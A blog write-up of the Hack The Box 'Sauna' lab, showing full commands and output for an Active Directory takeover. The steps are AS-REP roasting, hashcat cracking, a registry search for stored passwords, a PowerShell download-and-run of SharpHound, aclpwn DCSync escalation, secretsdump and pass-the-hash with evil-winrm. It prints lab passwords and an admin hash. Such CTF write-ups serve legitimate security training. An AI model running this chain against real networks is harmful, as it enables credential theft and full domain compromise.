HackTheBox WriteUp Sauna

Hack The Box Writeup: Sauna

After the JSON box has been phased out, a new Microsoft Windows box has been released. Under the name Sauna, this “Easy” box went live on February 15th for everyone to go wild with a good dose of DCSync power!

Hack The Box Sauna Infocard

[0x1] Reconnaissance & Enumeration

First step: the Nmap scan. The default Windows Server ports are visible and port 80 probably serves a website based on IIS 10.0

nmap -sV -sC -oA sauna

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 07:41 GMT

Nmap scan report for
Host is up (0.068s latency).
Not shown: 988 filtered ports
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 15:43:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-16T15:45:43
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 350.43 seconds

The website of the Egotistic Bank is shown at The maker of this box is Egotistic, so well…. that suddenly explains a lot.

There is little interesting to find while searching for usernames. Enum4linux gives no output and other tools remain silent as well. I always like to grab the “Team” pages of a website. Here you will often find hints to users. In this case, there are indeed a few to be found.

[0x2] Initial Foothold

A bit of brute force then. I’ve listed users.txt in users.txt based on default naming conventions. I take the first name, first name and first letter of the last name and first letter of the first name + last name. Let’s see if this pays off.

cat users.txt 

Using the GetNPUsers.py I search for accounts in the list from which I can grab the Ticket Granting Ticket (TGT). These are accounts with the option “Do not require Kerberos Preauthentication” on. I already choose to write any hashes in hascat format so that they will be easy to crack later.

python /usr/share/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.local/ -usersfile ~/Documents/boxes/sauna/users.txt -format hashcat -outputfile ~/Documents/boxes/sauna/kerb-hashes.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

The script is ready fairly quickly and an account is indeed found from which the TGT can be taken. The other accounts don’t seem to exist.

cat ~/Documents/boxes/sauna/kerb-hashes.txt

The hash goes straight to Hashcat and based on the Rockyou wordlist, the password is retrieved within 40 seconds.

hashcat -m 18200 ~/Documents/boxes/sauna/kerb-hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 1024/2955 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.b9f808b5.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs


Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde1...44312c
Time.Started.....: Sun Feb 16 09:17:01 2020 (21 secs)
Time.Estimated...: Sun Feb 16 09:17:22 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 510.1 kH/s (6.79ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Sun Feb 16 09:16:45 2020
Stopped: Sun Feb 16 09:17:23 2020

I can continue searching on Sauna knowing that the account fsmith with password Thestrokes23 is usable. There are some shares available, however the account has no rights to them. Not very interesting to find so I switch to logging in via Windows Remote Management using the tool Evil-WINRM.

evil-winrm -u fsmith -p "Thestrokes23" -i

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

[0x3] Path to User flag

Connection was successful. First check if this account is the holder of the user flag in its Desktop folder. It looks like it is.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir

    Directory: C:\Users\FSmith\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt     

There it is, the user-flag of Sauna. This makes the first part of this box in the pocket. There isn’t really much to do from the initial foothold, since the foothold is already the User path.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt

[0x4] Path to Root flag

One of the first checks is always the C: \ Users folder on a Windows Server. Here you will quickly find any hints to other users on the machine. In this case, svc_loanmgr stands out.

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr 

After a lot of enumeration, I eventually arrive at the registry via a tip. The password should be stored here and I am using a search query to search the registry for a string containing the word password. He likes this for a while and eventually I got hold of the password for the service account. The account is configured to login automatically and therefore the password can be found in plain text in the Winlogon hive.

reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword REG_SZ Moneymakestheworldgoround!

With the new account I do the same thing as with fsmith . Log in with Evil-WINRM to see what’s possible with this account.

evil-winrm -u "svc_loanmgr" -p "Moneymakestheworldgoround!" -i

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

After looking around for a while I don’t find anything interesting. After the Forest box I got some experience with BloodHound and I choose it here to see if I can find a path to any DCSync permissions with it. I am offering SharepHound via my machine so that I have can download and run. I then download the output for further analysis in Bloodhoud.

powershell -command "IEX(New-Object Net.WebClient).DownloadString(''); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 2:38 PM on 2/16/2020
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Status: 60 objects enumerated (+60 60/s --- Using 76 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:01.9931054
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\20200216143837_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

Before I can start BloodHound the Neo4j platform has to be running. This is only 1 command. If you experience problems with pid-locks error messages, please update your version of neo4j with apt-get install neo4j .

neo4j console

When neo4j has started it is BloodHounds turn.


I’m importing the output from the machine under the svc_loanmgr account to see the shortest path to Domain Admin. However, this does not yield more than needing the Administrator account . With a query to look for DCSync permissions I get more output.

Yet it is not yet clear what is needed. Via a blog of Dirk-jan Mollema I ended up with one of his tools as an extension of Bloodhound called: ACLPWN. Based on Bloodhound you determine the start and the end goal and then you use ACLPWN to do a “dry” test run first and then actually perform the actions to grab DCSync rights. You can install ACLPWN from Github via PIP.

pip install aclpwn 

First, I do a quick check with the -dry parameter. The path is correct and there is indeed a possibility to obtain DCSync.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local -dry

[+] Path found!
[+] Path validated, the following modifications are required for exploitation in the current configuration:
[-] DCSync -> continue

And then for real. Without the -Dry parameter, ACLPWN immediately submits the changes and gives svc_loanmgr the desired permissions..

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
[-] DCSync -> continue
[+] Finished running tasks

Now it is only a matter of requesting a sync from the domain controller, in this case Sauna, and writing the hashes to adhashes.txt .

python /usr/share/impacket/examples/secretsdump.py egotistical-bank/svc_loanmgr@ -just-dc -outputfile adhashes.txt

All local and domain accounts are neatly written for further processing.

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...

Why make it difficult when it can also be easy. No John the Ripper or Hashcat, just use the hash to login with Evil-WINRM. The root.txt is already waiting for me on the desktop.

evil-winrm -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
    Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 1/23/2020 10:22 AM 32 root.txt 

Do you even got root bro? Well, now I have 🙂 Interesting box where the methods weren’t that complicated, but a lot of time is spent in the enumeration.

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt

[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]


Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Add comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.